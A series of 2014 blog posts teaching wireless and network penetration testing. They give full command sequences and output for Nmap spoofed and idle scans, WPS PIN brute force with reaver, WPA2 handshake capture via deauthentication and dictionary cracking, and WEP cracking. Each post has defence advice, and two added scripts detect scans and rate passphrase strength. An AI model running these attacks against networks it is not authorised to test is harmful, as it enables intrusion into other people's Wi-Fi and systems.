17 February 2014

Using NMap to enumerate network devices

1. Some background info
NMap is a free utility for network discovery and security auditing. Initially designed as a better replacement for ping, it has grown into a full-fledged network auditing framework which can discover devices, find out what services and OS versions are running and what firewalls/IDS/IPS are in place, and even run exploits or DoS attacks thanks to its flexible scripting engine. More about NMap and what it can do here.

2. The task
We will use various NMap scan techniques to discover targets in our network, what ports they have open and what services are listening on those ports.

3. Requirements
- a laptop/PC running NMap. You can get NMap here for whatever platform you are running. Alternatively you can use a pentest distribution like Kali.
- a target. You can use another computer from your network or a virtual machine. I use Metasploitable. You can get and find more about it here. I advise you to get it as we're going to use it as a target for future lessons.
Please ensure you have permission to scan the target. While port scanning by itself is not illegal in most countries, it can be annoying and even dangerous (services on the target could crash because of it). Also, some ISPs don't take kindly to it, so you might end up losing your internet subscription.
My advice: use a virtual machine.

4. Let's begin
Open a command prompt/terminal and execute

nmap

You will get a list of the various arguments NMap can be run with. NMap has a GUI as well but today we're going to use the command prompt. You can scan a range of IPs using this command:

nmap 192.168.100.1-200

The command above will scan all IPs from 192.168.100.1 to 192.168.100.200. There are many other ways to specify IP ranges. Let's say we found a live target at 192.168.100.102. By default, when we only pass a target or a range of targets, NMap sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80 and an ICMP timestamp request. We can use arguments to change this.
The following command only sends a TCP ACK packet to port 80, skipping the ping:

nmap -p80 -sA -Pn 192.168.100.102

This is a much quieter scan, but a packet sniffer/IDS/IPS on the target can still see our attempt. Fortunately NMap allows us to spoof our IP address. The following command uses fragmentation to evade IDS/IPS and IP spoofing to make it look as if someone else was doing the scan (keep in mind that the replies then go to the spoofed address, so NMap itself gets no results back):

nmap -p80 -sA -Pn -f -S 192.168.100.101 -e eth0 192.168.100.102

The command makes it look as if 192.168.100.101 was doing the scan. There is also another way, called an idle scan or zombie scan. For this approach we need another live device in the network which is idle and has an open port. The following command uses 192.168.100.101, which has port 2869 open, to scan port 80 on target 192.168.100.102:

nmap -p80 -Pn -sI 192.168.100.101:2869 192.168.100.102

NMap can do more than just scan ports. The next command will try to discover what OS is running on the target:

nmap -O -Pn 192.168.100.102

For OS detection to be reliable the target needs to have at least one open port and one closed port.
NMap has a lot more to offer; we've barely scratched the surface. You can begin by studying and working through the examples from the NMap Reference Guide.
A great book related to NMap is Nmap 6: Network Exploration and Security Auditing Cookbook.
A good idea is to set up Wireshark on your target so you can see what each scan you run looks like on the wire and what it does. You can get some sample captures I made from here.

5. Alternatives
The hping utility is a good alternative. It comes with a lot of features and, just like NMap, you can extend its functionality through scripts (hping uses Tcl; NMap uses a flavour of Lua).

6. How to defend
You can't prevent port scanning, but then again port scanning by itself is not dangerous. What you can do is limit the information a port scanner like NMap can get from you. Always use a firewall and never open ports unless you really need them. You can also configure an IPS/IDS and monitor the activity, though I haven't found one that works easily out of the box for personal use. You can also have Wireshark set up for intrusion detection.
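If you want to monitor for the kind of traffic described in this post without a full IDS, the probe pattern NMap sends by default (ICMP echo, SYN to 443, ACK to 80, ICMP timestamp) and a run of connections to many ports from one source are both easy to spot. The following is an added example, not code from the original post; it works on a constructed, simplified one-packet-per-line log format (epoch, source, destination, protocol, detail), so feeding it real traffic would first need a parser for your own sensor's output.

```python
"""Spot Nmap-style host discovery and port sweeps in a packet log.

Added example, not code from the original post. It reads a constructed,
simplified log with one packet per line:
    <epoch-seconds> <src-ip> <dst-ip> <proto> <detail>
where detail is "SYN <port>" / "ACK <port>" for TCP and "echo-request" /
"timestamp-request" for ICMP. Real traffic would first need a parser for
your own sensor's format (tshark, Zeek conn logs, firewall logs).
"""
from collections import defaultdict

# Nmap's default host discovery as described above: an ICMP echo request,
# a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request.
DISCOVERY_SIGNATURE = {
    ("ICMP", "echo-request"),
    ("TCP", "SYN 443"),
    ("TCP", "ACK 80"),
    ("ICMP", "timestamp-request"),
}

# Constructed sample: .50 runs the default discovery against .102 and then
# walks ports 21-35 one per second; .60 is a single ordinary connection.
SAMPLE_LOG = (
    "1392631200 192.168.100.50 192.168.100.102 ICMP echo-request\n"
    "1392631200 192.168.100.50 192.168.100.102 TCP SYN 443\n"
    "1392631200 192.168.100.50 192.168.100.102 TCP ACK 80\n"
    "1392631201 192.168.100.50 192.168.100.102 ICMP timestamp-request\n"
    + "".join(
        f"{1392631210 + i} 192.168.100.50 192.168.100.102 TCP SYN {port}\n"
        for i, port in enumerate(range(21, 36))
    )
    + "1392631300 192.168.100.60 192.168.100.102 TCP SYN 80\n"
)


def parse_log(text):
    """Turn the log text into (ts, src, dst, proto, detail) tuples."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, proto, detail = line.split(maxsplit=4)
            events.append((int(ts), src, dst, proto, detail))
    return events


def _windows(items, window):
    """For each (ts, value) as a start point, yield the values seen within `window` seconds of it."""
    items = sorted(items)
    for i, (t0, _) in enumerate(items):
        yield [v for t, v in items[i:] if t - t0 <= window]


def find_discovery_probes(events, window=5):
    """(src, dst) pairs that received all four default probes within `window` seconds."""
    per_pair = defaultdict(list)
    for ts, src, dst, proto, detail in events:
        if (proto, detail) in DISCOVERY_SIGNATURE:
            per_pair[(src, dst)].append((ts, (proto, detail)))
    return {pair for pair, probes in per_pair.items()
            if any(set(w) == DISCOVERY_SIGNATURE for w in _windows(probes, window))}


def find_port_sweeps(events, min_ports=10, window=60):
    """{(src, dst): distinct TCP ports} for sources touching >= min_ports ports within `window` seconds."""
    per_pair = defaultdict(list)
    for ts, src, dst, proto, detail in events:
        if proto == "TCP":
            per_pair[(src, dst)].append((ts, int(detail.split()[1])))
    sweeps = {}
    for pair, pkts in per_pair.items():
        most = max((len(set(w)) for w in _windows(pkts, window)), default=0)
        if most >= min_ports:
            sweeps[pair] = most
    return sweeps


if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    print("default discovery seen from:", find_discovery_probes(ev))
    print("port sweeps:", find_port_sweeps(ev))
```

Tune the thresholds to your network: a legitimate monitoring host can also touch many ports, so treat hits as something to look at rather than an automatic block.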

7. What's next?
We now have a target. We know some basic info about it, like what ports are open, what services are using those ports and the OS. It is time to find a weakness and exploit it, and that's what we'll do next time.

06 February 2014

New tools of the trade - Kali pentest distribution

After encountering some issues configuring and running Metasploit framework on BackTrack 5 R3 in a virtual machine, I have decided to finally make the switch to Kali.

So far the decision has been a good one. Kali runs fine both in a virtual machine and as a live USB stick. The interface is nice and sleek, if a bit too dark and lacking any colour. But it's customizable, so it's not a real issue.
I also like the new "Start" menu and how applications are arranged. It's easier to navigate than BackTrack.

The Top 10 Security Tools menu is also a nice addition and lists the best tools you can use, like the Metasploit framework for all your exploitation needs, Aircrack-ng for testing and penetrating wireless networks, Wireshark for analyzing network traffic, Nmap for discovering targets and their weak spots, and some others just as useful.

Everything runs well without unexpected errors or other anomalies. Installation is very straightforward, has an intuitive GUI and provides all sorts of neat options (like encrypting the drive).

You can get Kali and read more about it here.

30 January 2014

Cracking WPA using BackTrack (WPS attack)

1. Some background info
WPS stands for WiFi Protected Setup and it's a protocol designed to simplify connecting clients to wireless networks. Routers provide an 8-digit PIN code for clients to use to connect. Some also have a button which you can press when a client tries to connect to have it connected automatically, without requiring the client to enter a key or PIN.

2. The task
In this post we will crack a WPA2-PSK encrypted access point which has WPS enabled and get the key and PIN. For cracking WPA2-PSK with a different method see this post.

3. Requirements
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet if your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WPA2-PSK encryption which supports WPS and has it enabled;

4. Let's begin
Open a terminal window.
First things first, we need to enable monitor mode for our wireless card.

   airmon-ng start wlan0

Now that our wireless card is properly setup, let's find our network. The following command will enumerate the wireless access points and clients in range and also provide us with useful information:

   airodump-ng mon0

The output is something like this:

 CH 13 ][ Elapsed: 4 s ][ 2014-01-29 14:08                                      
                                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID              
                                                                                               
 80:1F:02:4B:F9:5C  -45        8        0    0  11  54e  WPA2 CCMP   PSK  Edimax AP          
 10:BF:48:92:A2:80  -87        5        0    0   1  54e  WPA2 CCMP   PSK  ASUS                
                                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    
                                                                                               
 80:1F:02:4B:F9:5C  60:D8:19:A7:33:21  -50    0 - 5e     0        1                            

The above output shows us that there are two access points in range, Edimax AP and ASUS, both using WPA2-PSK encryption. We don't know yet if our target, Edimax AP, has WPS enabled. Let's stop airodump-ng and use wash to check our target:

   wash -i mon0 -c 11

We're checking all access points on channel 11. In our case Edimax AP appears to have WPS enabled (output will come soon, forgot to save it).

If you're getting an error that wash cannot get to channel 11, it's because airodump-ng hops between channels and the interface's channel remains set to whatever channel airodump-ng was on when it was stopped. Run this command to switch your interface to channel 11:

   airodump-ng --channel 11 mon0

Time to try and attack it. For that we'll use reaver. Reaver attempts to associate with the target AP, then begins a brute-force attack, trying each PIN combination. Because of the way WPS is designed, although the PIN has 8 digits there are only 11,000 possible combinations to try. Assuming the correct PIN is not the last one reaver tries, there will be a lot fewer attempts before the correct PIN is found. Let's fire up reaver and see what comes up:
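Where the 11,000 figure comes from, as an added derivation that is not part of the original post (it follows the public layout of a WPS PIN):

$$\text{PIN} = \underbrace{d_1 d_2 d_3 d_4}_{\text{half 1}}\;\underbrace{d_5 d_6 d_7}_{\text{half 2}}\;\underbrace{d_8}_{\text{checksum of } d_1 \ldots d_7}$$

The exchange checks the two halves in separate steps (in the log below, a WSC NACK right after M4 means half 1 was rejected, while M5 through M7 only appear once half 1 is correct), and $d_8$ is fixed by the other seven digits. So instead of the full $10^8$ space, the number of candidates is only

$$N = \underbrace{10^4}_{\text{half 1}} + \underbrace{10^3}_{\text{half 2}} = 11{,}000,$$

and on average the right PIN turns up after about $N/2 = 5{,}500$ attempts, which is the "a lot fewer attempts" the post refers to. This is why the defence section below says to disable WPS rather than rely on a strong PIN.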

   reaver -i mon0 -b 80:1F:02:4B:F9:5C -vv

The output will start flowing:

[+] Waiting for beacon from 80:1F:02:4B:F9:5C
[+] Switching mon0 to channel 11
[+] Associated with 80:1F:02:4B:F9:5C (ESSID: Edimax AP)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
...and so on

Quick note: with some routers reaver will not be able to associate. In this case we can use aireplay-ng and tell reaver not to attempt association. You might also need to have aireplay-ng try to associate constantly. It all depends on the AP model and how its firmware works; you need to play around and experiment. The following command associates using aireplay-ng:

   aireplay-ng --fakeauth 30 -e "Edimax AP" mon0

And to tell reaver that we are associating through some other application:

   reaver -i mon0 -A -b 80:1F:02:4B:F9:5C -vv

After a while, if everything is ok, you will get this:

[+] Trying pin 63442519
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 678 seconds
[+] WPS PIN: '63442519'
[+] WPA PSK: 'Test1234'
[+] AP SSID: 'Edimax AP'

Congratulations, you have just cracked the key and the PIN.

5. Alternatives
BackTrack also comes with Fern WiFi Cracker (Exploitation Tools->Wireless Exploitation Tools->WLAN Exploitation->Fern-wifi-cracker-ng), which has a nice GUI for finding targets and attacking them.

6. How to defend
Defending against this attack should be as simple as disabling WPS. However, some routers/APs keep WPS enabled even if you disable it in the settings and, what's worse, they also respond to reaver's requests. Here is a list of various router models and how vulnerable they are to this attack.

7. What's next?
Now that we gained access to the network it's time to explore it. In the next post we'll see how to discover targets and get information about them.

Cracking WPA encryption using BackTrack (dictionary attack)

1. Some background info
WPA stands for WiFi Protected Access and is a security protocol for protecting wireless networks. WPA and WPA2 were developed in response to the serious weaknesses discovered in WEP. For information on how to crack WEP-encrypted access points see this post.

2. The task
In this post we will crack a WPA2-encrypted access point which uses a pre-shared key. For that we will use BackTrack, our trusty pentesting distribution.

3. Requirements
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet if your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WPA2-PSK encryption;
- a client connected to the access point (another laptop/smartphone/etc.)

4. Let's begin
Open a terminal window.
First things first, we need to enable monitor mode for our wireless card.

airmon-ng start wlan0

Now that our wireless card is properly set up, let's find our network. The following command will enumerate the wireless access points and clients in range and also provide us with useful information:

airodump-ng mon0

The output is something like this:

 CH 13 ][ Elapsed: 4 s ][ 2014-01-29 14:08                                      
                                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID              
                                                                                               
 80:1F:02:4B:F9:5C  -45        8        0    0  11  54e  WPA2 CCMP   PSK  Edimax AP          
 10:BF:48:92:A2:80  -87        5        0    0    1  54e  WPA2 CCMP   PSK  ASUS                
                                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    
                                                                                               
 80:1F:02:4B:F9:5C  60:D8:19:A7:33:21  -50    0 - 5e     0        1                            

The above output shows us that there are two access points in range, Edimax AP and ASUS, both using WPA2-PSK encryption.
We can also see that there is a wireless client with MAC address 60:D8:19:A7:33:21 connected to our target (MAC 80:1F:02:4B:F9:5C).
We're going to need that client to get the relevant packets which we're going to crack and get the key from.

Now that we know our target it's time to get to work. We're going to have airodump-ng capture packets from our target and write them to a .cap file.
The following command will do it:

airodump-ng -w EdimaxCapture --bssid 80:1F:02:4B:F9:5C --channel 11 mon0

The idea here is to catch the so-called handshake. The handshake is a set of messages exchanged between the client and the access point which ends with the client being authenticated (assuming it has the right key). The thing is, the handshake only occurs when a client connects to the access point. So we have two options: we either wait for a new client to connect (nah) or we simply disconnect a connected client and let it reconnect. Since the second option sounds more interesting, let's do that. We're going to use aireplay-ng to send deauth packets to the client.
Let's open a new terminal window and run this command:

aireplay-ng -a 80:1F:02:4B:F9:5C -c 60:D8:19:A7:33:21 --deauth 4 mon0

So we've sent 4 deauth packets to the client connected to the target. Time to get back to the terminal window capturing the packets and see if anything interesting was caught:

 CH 11 ][ Elapsed: 9 mins ][ 2014-01-29 14:25 ][ WPA handshake: 80:1F:02:4B:F9:5C            
                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID          
                                                                                             
 80:1F:02:4B:F9:5C  -39 100     5378     1155    2  11  54e  WPA2 CCMP   PSK  Edimax AP      
                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    
                                                                                             
 80:1F:02:4B:F9:5C  60:D8:19:A7:33:21  -127    1e- 0e     0      655                          

Aha, it seems we caught a handshake for our target; look at the top-right part of the output.
Now that we have it we can stop the capture and start the actual cracking.

We are going to use a dictionary attack to attempt to find the password. The dictionary is merely a text file which contains one candidate string per line. This is where the tricky part comes in: for our attack to be successful, the key must be one of those strings. The internet is full of wordlists which you can try to use to crack a password. For the purpose of this tutorial I created a small wordlist which also contains the key for the access point.
Let's run the following command and see what comes up:

aircrack-ng -w wordlist.txt -a 2 -b 80:1F:02:4B:F9:5C EdimaxCapture-02.cap

One quick note: even though the -w argument for airodump-ng was EdimaxCapture, it created EdimaxCapture-02.cap (airodump-ng appends an incrementing number to the prefix so it never overwrites an earlier capture). If you get an error when running aircrack-ng saying that it cannot find the file, use the ls command to see what files are in the current folder.

If aircrack finds the key it will output this:

                                 Aircrack-ng 1.1 r2178


                   [00:00:00] 6 keys tested (403.00 k/s)


                           KEY FOUND! [ Test1234 ]


      Master Key     : 0C 21 E6 27 23 1E AD 61 B5 29 BD FE 74 A0 89 C7
                       D4 77 88 92 78 D1 6D DD A8 4F 79 4A 34 32 1A 4D

      Transient Key  : BC 29 70 E1 CF 79 11 13 A8 BC 6A 5B 38 7E D8 C8
                       5F B0 51 24 51 A0 D8 6E C3 1E 8B 24 53 DD F6 A7
                       DF B1 71 6D 27 C5 23 55 9A 7C 17 4D C0 AC B2 27
                       BC 9E 72 98 C6 0E D2 6A 0E 22 49 16 19 CD 99 31

      EAPOL HMAC     : 30 0F 90 38 7C C2 21 4F 6A 2E 30 48 30 74 2C F6

Congratulations, you have just cracked the key.

5. Alternatives
BackTrack also provides other applications for cracking WPA. The most notable is Gerix (Exploitation Tools->Wireless Exploitation Tools->WLAN Exploitation->Gerix-wifi-cracker-ng), which offers an intuitive GUI and point-and-click navigation. Play around and experiment.

6. How to defend
This attack is easy to fend off because it relies on guessing the key, so use something that's hard to guess. An 8-character key with upper and lower case letters, symbols and numbers would be impossible to crack with this attack. More characters, better protection. Just don't go nuts with really long ones; I consider a 16-character key to be more than enough (something like d!4PfY#cM&35zt@5).
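To put numbers on this advice, here is an added example (not code from the original post) that scores a candidate passphrase the way the attack above sees it: does it appear in the wordlist, and how big is the space an attacker would have to exhaust at the 403,000 keys/s rate aircrack-ng reported in the run above. The wordlist is a constructed stand-in for wordlist.txt, and the rate is just the figure from this post; GPU crackers are far faster.

```python
"""Assess a WPA2-PSK passphrase against the dictionary attack shown above.

Added example, not code from the original post. The only "benchmark" is the
403,000 keys/s that aircrack-ng printed in the post's own run; treat it as a
constructed reference point, real attackers with GPUs are much faster.
"""
import string

OBSERVED_RATE = 403_000  # keys per second, from the aircrack-ng output above

# Character classes; the alphabet an attacker has to cover is the union of
# the classes the key actually uses.
CLASSES = {
    "lower": string.ascii_lowercase,
    "upper": string.ascii_uppercase,
    "digit": string.digits,
    "symbol": string.punctuation,
}

# Constructed stand-in for wordlist.txt; it contains the post's key "Test1234".
WORDLIST = ["password", "12345678", "Test1234", "letmein1"]


def classes_used(key):
    """Names of the character classes present in the key."""
    return {name for name, chars in CLASSES.items() if any(c in chars for c in key)}


def alphabet_size(key):
    return sum(len(CLASSES[name]) for name in classes_used(key))


def keyspace(key):
    """Worst-case number of guesses to exhaust every key of this length and shape."""
    return alphabet_size(key) ** len(key)


def years_to_exhaust(key, rate=OBSERVED_RATE):
    return keyspace(key) / rate / (365 * 24 * 3600)


def in_wordlist(key, wordlist=WORDLIST):
    """A dictionary attack only wins if the key is literally in the list."""
    return key in wordlist


def assess(key):
    # WPA-PSK passphrases are 8 to 63 characters; anything else is rejected by the AP.
    if not 8 <= len(key) <= 63:
        raise ValueError("WPA-PSK passphrases are 8 to 63 characters")
    return {
        "length": len(key),
        "classes": sorted(classes_used(key)),
        "alphabet": alphabet_size(key),
        "keyspace": keyspace(key),
        "years_at_observed_rate": years_to_exhaust(key),
        "in_wordlist": in_wordlist(key),
    }


if __name__ == "__main__":
    for k in ("Test1234", "d!4PfY#cM&35zt@5"):
        r = assess(k)
        print(f"{k!r}: classes={r['classes']} alphabet={r['alphabet']} "
              f"~{r['years_at_observed_rate']:.3g} years to exhaust, "
              f"in wordlist={r['in_wordlist']}")
```

The point the numbers make: "Test1234" has a respectable 62-character alphabet but falls instantly because it is in the list, so a passphrase that is not a dictionary word matters more than raw length.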

7. What's next?
There is, however, a way to crack a WPA2-PSK encrypted access point no matter how strong the key is, and that is through WPS (WiFi Protected Setup). We will cover this attack in the next post.

29 January 2014

BackTrack and Kali

As of January 2014 (maybe earlier, but that's when I found out) BackTrack is no longer maintained. Offensive Security, its creators, are now focusing their efforts on Kali, a pentesting suite similar to BackTrack.
You can read more about Kali here.
Among the most notable changes, those I'm most excited about are the transition to Debian and the ARM support, which increases portability even more.

28 January 2014

Cracking WEP encryption using BackTrack

1. Some background info
WEP stands for Wired Equivalent Privacy and is a security algorithm for protecting wireless networks. The algorithm has been shown to be flawed and easily broken, which is why in 2003 it was superseded by WPA (WiFi Protected Access).

2. The task
In the following post I will show you how to crack a WEP-encrypted access point and get the key using BackTrack.

3. Requirements
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet if your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WEP encryption;
- a client for the wireless network (another laptop/mobile phone/etc.);

4. Let's begin
Open a terminal window.
First things first, we need to enable monitor mode for our wireless card. While it is not mandatory, I prefer to do it this way. Read more about it here.

airmon-ng start wlan0

Now that our wireless card is properly set up, let's find our network. The following command will enumerate the wireless access points and clients in range and also provide us with useful information:

airodump-ng mon0

The output is something like this:
-------------------------------------------------------------
CH  3 ][ Elapsed: 12 s ][ 2014-01-27 16:29                                      
                                                                                           
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID            
                                                                                           
 80:1F:02:4B:F9:5C  -33        7        0    0  11  54   WEP  WEP         Edimax AP        
 10:BF:48:92:A2:80  -84       11        1    0   1  54e  WPA2 CCMP   PSK  ASUS              
                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                  
                                                                                           
 80:1F:02:4B:F9:5C  D8:50:E6:20:D1:07  -84    0 -11     41      113  
-------------------------------------------------------------

The above output shows us that there are two access points in range: Edimax AP, our target, with WEP encryption, and ASUS, a WPA2-encrypted access point.
We can also see that there is a wireless client with MAC address D8:50:E6:20:D1:07 connected to our target (MAC 80:1F:02:4B:F9:5C).
This is good, as it is usually faster to get the encryption key when there are clients connected.

Now that we know our target we need to perform a fake authentication with it. This will allow us to communicate with our target. The following command does just that:

aireplay-ng -1 0 -a 80:1F:02:4B:F9:5C -h 84:4b:f5:6a:6b:83 -e "Edimax AP" mon0

The output should read "Association was succesful :)" on the last line. If it doesn't, then you need to experiment with aireplay-ng's various options. This depends on the access point you are attacking.


Now that we are authenticated and associated with our target, it's time to begin the actual attack. Aireplay-ng offers many options and attack vectors against access points and clients alike. For the full set of options just type aireplay-ng in the terminal and hit enter. So far we used the fake authentication to open a communication channel with the target.
We will now use option 3, standard ARP-request replay. What we'll do is capture the communication between the access point and its clients, which we'll then use to get the key.
So, let's capture:

aireplay-ng -3 -b 80:1F:02:4B:F9:5C -h 84:4b:f5:6a:6b:83 mon0

We are now capturing data. If you look at the output you will see a line which says "Captured packets saved to replay_arp-[some number].cap". That's the file we're going to work with.
You will also see in the output that we are advised to start airodump-ng to capture packets as well. So, let's leave this running, open another terminal window and run airodump-ng:

airodump-ng -c 11 -w capture --bssid 80:1F:02:4B:F9:5C mon0

This will capture packets into a capture.cap file (airodump-ng actually appends a number to the prefix, e.g. capture-01.cap, so check with ls and use the real name in the command below). We need to leave this running for a while. How long depends on how much traffic there is through the access point. Let's wait five minutes for a start. Now, for the final step, we'll use aircrack-ng to strip the key from the captured packets.

aircrack-ng -b 80:1F:02:4B:F9:5C replay_arp-[some number].cap capture.cap

Now aircrack-ng will attempt to get the key from our capture files. Let's look at the output. What we're interested in is the first line, "Tested keys XXXXXXXX [some number IVs]". For a crack to be successful we need as many IVs as possible. The more packets we capture, the more IVs we'll have and the higher the chances of a successful crack.
If the output of aircrack-ng informs you that it failed, wait some more, then run the above command again.

At some point aircrack-ng will output "!!!!KEY FOUND: ThisIsAWEPKey", or "KEY FOUND" and a hex number. Both are just as valid. Congratulations, you have just cracked the key.

5. Alternatives
As said before, aireplay-ng is very versatile. Using option 6 (the Caffe-Latte attack) you can target a client instead of the access point. The best part is that you can direct such an attack at a client even if it's not connected to the access point. Windows clients (and not only Windows; I found Android does the same) send packets in an attempt to connect to the access points they have saved in their preferred list. These are the packets Caffe-Latte captures for aircrack-ng to do its job.
BackTrack also provides other applications for cracking WEP. The most notable is Gerix (Exploitation Tools->Wireless Exploitation Tools->WLAN Exploitation->Gerix-wifi-cracker-ng), which offers an intuitive GUI and point-and-click navigation. Play around and experiment.

6. How to defend
The best way to defend against such an attack is not to use WEP. Use WPA with a proper key (upper and lower case letters, numbers and symbols) if you want real security.

7. What's next?
While WPA is much more secure, it is still not impossible to break. The next post will cover cracking a WPA pre-shared key using a brute-force dictionary attack.